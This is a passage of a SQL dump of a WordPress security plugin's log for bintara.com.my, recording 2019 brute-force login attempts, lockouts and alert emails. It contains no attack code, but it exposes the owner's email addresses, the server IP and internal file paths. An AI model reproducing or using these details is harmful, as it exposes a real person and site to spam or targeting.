MIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYlSTDrcQxTmGrCWuaRPgAAAcg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569072457.503\";s:12:\"REQUEST_TIME\";s:10:\"1569072457\";}}','notice','2019-09-21 13:27:38','2019-09-21 13:27:37',17797224,19283040,'https://bintara.com.my/wp/wp-login.php',1,0,'178.128.68.121'),(25923,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:27:37\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:27:37\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:42:37\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:42:37\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:27:38','2019-09-21 13:27:37',17881520,19283040,'https://bintara.com.my/wp/wp-login.php',1,0,'178.128.68.121'),(25924,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:27:38','2019-09-21 13:27:37',18087168,19283040,'https://bintara.com.my/wp/wp-login.php',1,0,'178.128.68.121'),(25925,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYlaDDrcQxTmGrCWuaRRQAAAcU\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"45.118.145.84\";s:11:\"REMOTE_PORT\";s:5:\"59110\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYlaDDrcQxTmGrCWuaRRQAAAcU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072488.8917\";s:12:\"REQUEST_TIME\";s:10:\"1569072488\";}}','notice','2019-09-21 13:28:10','2019-09-21 13:28:09',17798048,19288688,'https://bintara.com.my/2019/wp-login.php',1,0,'45.118.145.84'),(25926,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:28:09\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:28:09\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:43:09\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:43:09\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:28:10','2019-09-21 13:28:09',17882880,19288688,'https://bintara.com.my/2019/wp-login.php',1,0,'45.118.145.84'),(25927,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:28:10','2019-09-21 13:28:09',18088560,19288688,'https://bintara.com.my/2019/wp-login.php',1,0,'45.118.145.84'),(25928,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYleXkXpgmG5P@iB8kyVAAAAI0\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.244.116\";s:11:\"REMOTE_PORT\";s:5:\"51004\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYleXkXpgmG5P@iB8kyVAAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072505.3085\";s:12:\"REQUEST_TIME\";s:10:\"1569072505\";}}','notice','2019-09-21 13:28:26','2019-09-21 13:28:25',17798056,19287504,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(25929,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:28:25\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:28:25\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:43:25\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:43:25\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:28:26','2019-09-21 13:28:25',17882944,19287504,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(25930,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:28:26','2019-09-21 13:28:25',18088536,19287504,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(25931,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYlhFiJ7D9Gn7wDPh8hYAAAAM8\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.127.58\";s:11:\"REMOTE_PORT\";s:5:\"30650\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYlhFiJ7D9Gn7wDPh8hYAAAAM8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072516.1786\";s:12:\"REQUEST_TIME\";s:10:\"1569072516\";}}','notice','2019-09-21 13:28:37','2019-09-21 13:28:36',17798856,19288248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'159.65.127.58'),(25932,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:28:36\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:28:36\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:43:36\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:43:36\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:28:37','2019-09-21 13:28:36',17883176,19288248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'159.65.127.58'),(25933,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:28:37','2019-09-21 13:28:36',18088928,19288248,'https://bintara.com.my/wordpress/wp-login.php',1,0,'159.65.127.58'),(25934,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYlinkXpgmG5P@iB8kycQAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"186.202.161.98\";s:11:\"REMOTE_PORT\";s:5:\"50837\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYlinkXpgmG5P@iB8kycQAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072522.5823\";s:12:\"REQUEST_TIME\";s:10:\"1569072522\";}}','notice','2019-09-21 13:28:43','2019-09-21 13:28:42',17803728,19288888,'https://bintara.com.my/2019/wp-login.php',1,0,'186.202.161.98'),(25935,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:28:42\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:28:42\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:43:42\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:43:42\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:28:43','2019-09-21 13:28:42',17887648,19288888,'https://bintara.com.my/2019/wp-login.php',1,0,'186.202.161.98'),(25936,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:28:43','2019-09-21 13:28:42',18093936,19288888,'https://bintara.com.my/2019/wp-login.php',1,0,'186.202.161.98'),(25937,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYlzHkXpgmG5P@iB8kypAAAAIg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.95.126\";s:11:\"REMOTE_PORT\";s:5:\"40502\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYlzHkXpgmG5P@iB8kypAAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569072588.3023\";s:12:\"REQUEST_TIME\";s:10:\"1569072588\";}}','notice','2019-09-21 13:29:49','2019-09-21 13:29:48',17798336,19287184,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.202.95.126'),(25938,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:29:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:29:48\";s:14:\"lockout_expire\";s:19:\"2019-09-21 21:44:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 13:44:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:29:49','2019-09-21 13:29:48',17882432,19287184,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.202.95.126'),(25939,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:29:49','2019-09-21 13:29:48',18088080,19287184,'https://bintara.com.my/wordpress/wp-login.php',1,0,'149.202.95.126'),(25940,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 